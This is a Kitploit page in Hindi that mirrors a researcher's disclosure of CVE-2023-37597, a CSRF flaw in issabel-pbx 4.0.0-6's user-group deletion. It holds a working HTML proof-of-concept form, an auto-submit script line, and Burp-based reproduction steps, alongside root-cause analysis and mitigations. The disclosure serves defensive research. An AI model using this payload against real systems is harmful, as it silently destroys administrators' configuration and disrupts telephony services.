Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 में अपने उपयोगकर्ता समूह प्रबंधन कार्यक्षमता में एक Cross-Site Request Forgery (CSRF) भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/sahiloj/cve-2023-37597
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 में अपने उपयोगकर्ता समूह प्रबंधन कार्यक्षमता में एक Cross-Site Request Forgery (CSRF) भेद्यता है।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-37597 — issabel-pbx 4.0.0-6: क्रॉस-साइट अनुरोध जालसाजी (CSRF) — उपयोगकर्ता समूह हटाएं

अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। इस शोषण का उपयोग किसी भी ऐसी प्रणाली पर न करें जिसके आप स्वामी नहीं हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।


विषय-सूची

  • अवलोकन
  • कमजोरी का विवरण
  • प्रभावित उत्पाद
  • तकनीकी विश्लेषण
  • हमले का परिदृश्य
  • प्रूफ ऑफ कॉन्सेप्ट (PoC)
    • पुनरुत्पादन के चरण
    • PoC शोषण कोड
  • प्रभाव
  • शमन और सुधार
प्रकटीकरण समयरेखा
  • संदर्भ
  • लेखक

  • अवलोकन

    issabel-pbx एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफॉर्म (PBX) है जो VoIP सेवाएं, टेलीफोनी प्रबंधन और वेब-आधारित प्रशासन प्रदान करता है। issabel-pbx के संस्करण 4.0.0-6 में इसके उपयोगकर्ता समूह प्रबंधन कार्यक्षमता में क्रॉस-साइट अनुरोध जालसाजी (CSRF) कमजोरी है।

    एक अप्रमाणित दूरस्थ हमलावर एक दुर्भावनापूर्ण HTML पेज बना सकता है, जिसे जब कोई प्रमाणित प्रशासक देखता है, तो वह चुपचाप किसी भी उपयोगकर्ता समूह को हटाने के लिए एक नकली HTTP POST अनुरोध भेजता है। चूंकि एप्लिकेशन CSRF टोकन या SameSite कुकी नीतियों के साथ राज्य-परिवर्तन अनुरोधों की उत्पत्ति को मान्य नहीं करता है, ब्राउज़र स्वचालित रूप से प्रशासक की सत्र कुकी शामिल करता है, जिससे पीड़ित की जानकारी या सहमति के बिना विलोपन सफल हो जाता है।


    कमजोरी का विवरण

    क्षेत्रमान
    CVE IDCVE-2023-37597
    कमजोरीक्रॉस-साइट अनुरोध जालसाजी (CSRF)
    CWECWE-352 — क्रॉस-साइट अनुरोध जालसाजी (CSRF)
    गंभीरतामध्यम
    CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
    प्रभावित संस्करणissabel-pbx 4.0.0-6
    प्रकटीकरण तिथि10 जुलाई 2023
    शोधकर्ताSahil Ojha

    प्रभावित उत्पाद

    क्षेत्रमान
    उत्पाद का नामissabel-pbx
    संस्करण4.0.0-6
    विक्रेताIssabel Foundation
    विक्रेता का होमपेजhttps://www.issabel.org/
    स्रोत कोडhttps://github.com/IssabelFoundation/issabelPBX
    परीक्षण किया गयाविंडोज (Burp Suite Community Edition)

    तकनीकी विश्लेषण

    CSRF क्या है?

    क्रॉस-साइट अनुरोध जालसाजी (CSRF) एक ऐसा हमला है जो पीड़ित के ब्राउज़र को लक्ष्य एप्लिकेशन पर हमलावर की ओर से एक प्रमाणित अनुरोध भेजने के लिए धोखा देता है। हमला तब सफल होता है जब:

    1. पीड़ित के पास लक्ष्य एप्लिकेशन के साथ एक सक्रिय प्रमाणित सत्र होता है।
    2. एप्लिकेशन अनुरोधों को प्रमाणित करने के लिए केवल सत्र कुकीज पर निर्भर करता है (यानी, कोई CSRF टोकन नहीं, कोई Origin/Referer मान्यता नहीं, कोई SameSite=Strict या SameSite=Lax कुकी विशेषता नहीं)।
    3. हमलावर राज्य-परिवर्तन अनुरोध की संरचना का अनुमान लगा सकता है।

    मूल कारण

    issabel-pbx 4.0.0-6 में उपयोगकर्ता समूह हटाएं एंडपॉइंट (/index.php?menu=grouplist) HTTP POST अनुरोधों को संसाधित करता है जिसमें केवल delete क्रिया और एक id_user पैरामीटर होता है। एप्लिकेशन निम्नलिखित नहीं करता है:

    • एक सिंक्रोनाइज़र (एंटी-CSRF) टोकन उत्पन्न या मान्य नहीं करता है।
    • Origin या Referer HTTP हेडर की जांच नहीं करता है।
    • सत्र कुकीज पर SameSite विशेषता सेट नहीं करता है।

    परिणामस्वरूप, पीड़ित के ब्राउज़र में लोड किया गया कोई भी वेब पेज मौजूदा सत्र का उपयोग करके चुपचाप विलोपन फॉर्म जमा कर सकता है, क्योंकि ब्राउज़र स्वचालित रूप से सत्र कुकी संलग्न करेगा।

    संवेदनशील एंडपॉइंट

    root@kitploit:~
    POST /index.php?menu=grouplist HTTP/1.1
    Host: <Issabel IP>
    
    delete=Delete&id_user=<USER_GROUP_ID>
    

    हमले का परिदृश्य

    1. हमलावर एक दुर्भावनापूर्ण HTML पेज बनाता है जिसमें एक छिपा हुआ फॉर्म होता है जो Issabel प्रशासन पैनल पर विलोपन अनुरोध POST करता है।
    2. हमलावर यह पेज एक प्रमाणित Issabel प्रशासक को देता है — फ़िशिंग ईमेल, चैट संदेश में एक लिंक, या किसी समझौता किए गए पेज पर एक एम्बेडेड `` के माध्यम से।
    3. पीड़ित का ब्राउज़र पेज लोड करता है। JavaScript स्वचालित रूप से फॉर्म सबमिट करता है, या पीड़ित को सामाजिक इंजीनियरिंग के माध्यम से एक नकली "Submit" बटन पर क्लिक करने के लिए प्रेरित किया जाता है।
    4. Issabel सर्वर प्रशासक की सत्र कुकी के साथ एक वैध POST अनुरोध प्राप्त करता है और बिना किसी अतिरिक्त पुष्टि या टोकन मान्यता के लक्षित उपयोगकर्ता समूह को हटा देता है।
    5. उपयोगकर्ता समूह स्थायी रूप से हटा दिया जाता है, जिससे कॉल रूटिंग, एक्सेस नियंत्रण और उस समूह पर निर्भर सभी उपयोगकर्ता प्रभावित होते हैं — जो प्रभावी रूप से एप्लिकेशन स्तर पर सेवा अस्वीकार का कारण बनता है।

    प्रूफ ऑफ कॉन्सेप्ट (PoC)

    चेतावनी: निम्नलिखित PoC पूरी तरह से शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल लैब वातावरण या उन प्रणालियों में करें जिनके लिए आपके पास स्पष्ट प्राधिकरण है।

    पुनरुत्पादन के चरण

    चरण 1 — Issabel प्रशासन पैनल में लॉग इन करें

    उपयोगकर्ता समूह सूची पृष्ठ पर जाएं और प्रशासक क्रेडेंशियल के साथ लॉग इन करें।

    root@kitploit:~
    https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11
    

    प्रशासन पैनल — उपयोगकर्ता समूह सूची


    चरण 2 — विलोपन अनुरोध को कैप्चर करें

    Burp Suite के माध्यम से ट्रैफ़िक को प्रॉक्सी करते हुए एक उपयोगकर्ता समूह को हटाने का प्रयास करें। कैप्चर किए गए POST अनुरोध पर राइट-क्लिक करें और शोषण HTML स्केलेटन उत्पन्न करने के लिए Engagement Tools → Generate CSRF PoC चुनें।

    Burp Suite — कैप्चर किया गया DELETE अनुरोध


    चरण 3 — CSRF शोषण पृष्ठ को होस्ट करें

    उत्पन्न HTML को एक फ़ाइल के रूप में सहेजें (नीचे PoC शोषण कोड देखें)। इसे एक हमलावर-नियंत्रित सर्वर पर होस्ट करें, या इसे सीधे पीड़ित को भेजें।


    चरण 4 — पीड़ित शोषण पृष्ठ खोलता है

    जब प्रमाणित प्रशासक शोषण URL खोलता है या पुनर्निर्देशित किया जाता है, तो छिपा हुआ फॉर्म स्वचालित रूप से सबमिट हो जाता है (या पीड़ित डिकॉय बटन पर क्लिक करता है)। लक्षित उपयोगकर्ता समूह प्रशासन पैनल से हटा दिया जाता है।

    शोषण सबमिट किया गया — समूह हटा दिया गया (पहले)

    शोषण सबमिट किया गया — समूह हटा दिया गया (बाद में)


    PoC शोषण कोड

    निम्नलिखित HTML फ़ाइल (CSRF exploit.html के रूप में भी उपलब्ध) हमले को प्रदर्शित करती है। {Issabel IP} को लक्ष्य होस्ट से बदलें और id_user को उस समूह ID से समायोजित करें जिसे आप हटाना चाहते हैं।

    root@kitploit:~
    <html>
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
          <input type="hidden" name="delete" value="Delete" />
          <input type="hidden" name="id_user" value="7" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

    स्वचालित-सबमिट संस्करण: पीड़ित को कुछ भी क्लिक करने की आवश्यकता को समाप्त करने के लिए, <body> टैग के अंदर निम्नलिखित जोड़ें ताकि पेज लोड होने पर फॉर्म स्वचालित रूप से सबमिट हो जाए:

    root@kitploit:~
    <script>document.forms[0].submit();</script>
    

    प्रभाव

    आयामविवरण
    अखंडताएक हमलावर Issabel प्रशासन पैनल से किसी भी उपयोगकर्ता समूह को चुपचाप हटा सकता है।
    उपलब्धताउपयोगकर्ता समूहों का विलोपन उन समूहों से संबंधित सभी उपयोगकर्ताओं के लिए कॉल रूटिंग नियमों, एक्सेस नियंत्रण और टेलीफोनी सेवाओं को बाधित करता है, जो आंशिक सेवा अस्वीकार के समान है।
    गोपनीयताइस कमजोरी से सीधे प्रभावित नहीं होता है।

    शमन और सुधार

    प्रशासकों और डेवलपर्स को निम्नलिखित बचाव लागू करने चाहिए:

    1. CSRF टोकन लागू करें (सिंक्रोनाइज़र टोकन पैटर्न)

      • प्रत्येक राज्य-परिवर्तन फॉर्म के लिए एक अद्वितीय, अप्रत्याशित, प्रति-सत्र (या प्रति-अनुरोध) टोकन उत्पन्न करें।
      • किसी भी POST/PUT/DELETE ऑपरेशन को संसाधित करने से पहले सर्वर-साइड पर टोकन को मान्य करें।
    2. SameSite कुकी विशेषता सेट करें

      • सत्र कुकीज को SameSite=Lax (न्यूनतम) या SameSite=Strict के साथ सेट करें ताकि क्रॉस-ऑरिजिन अनुरोध सत्र क्रेडेंशियल ले जाने से रोका जा सके।
      • उदाहरण प्रतिक्रिया हेडर: Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
    3. Origin और Referer हेडर को मान्य करें

      • सर्वर-साइड पर, उन अनुरोधों को अस्वीकार करें जिनका Origin या Referer हेडर एप्लिकेशन के अपने डोमेन से मेल नहीं खाता है।
    4. विनाशकारी क्रियाओं के लिए पुन: प्रमाणीकरण की आवश्यकता हो

      • समूहों को हटाने या अन्य विनाशकारी कार्यों को करने से पहले प्रशासक को अपना पासवर्ड पुष्टि करने के लिए प्रेरित करें।
    5. गहराई में रक्षा लागू करें

      • संवेदनशील एंडपॉइंट्स पर अप्रत्याशित क्रॉस-ऑरिजिन POST अनुरोधों को अवरुद्ध करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम का उपयोग करें।

    प्रकटीकरण समयरेखा

    तारीखघटना
    10 जुलाई 2023कमजोरी की खोज और दस्तावेजीकरण Sahil Ojha द्वारा
    10 जुलाई 2023CVE-2023-37597 आवंटित
    10 जुलाई 2023सार्वजनिक प्रकटीकरण

    संदर्भ

    • NVD — CVE-2023-37597
    • OWASP — क्रॉस-साइट अनुरोध जालसाजी (CSRF)
    • OWASP CSRF रोकथाम चीट शीट
    • CWE-352: क्रॉस-साइट अनुरोध जालसाजी (CSRF)
    • Issabel Foundation — issabelPBX

    लेखक

    Sahil Ojha सुरक्षा शोधकर्ता

    अगर आपको यह शोध उपयोगी लगा हो, तो कृपया रिपॉजिटरी को ⭐ स्टार करने में संकोच न करें।

    टूल डाउनलोड करें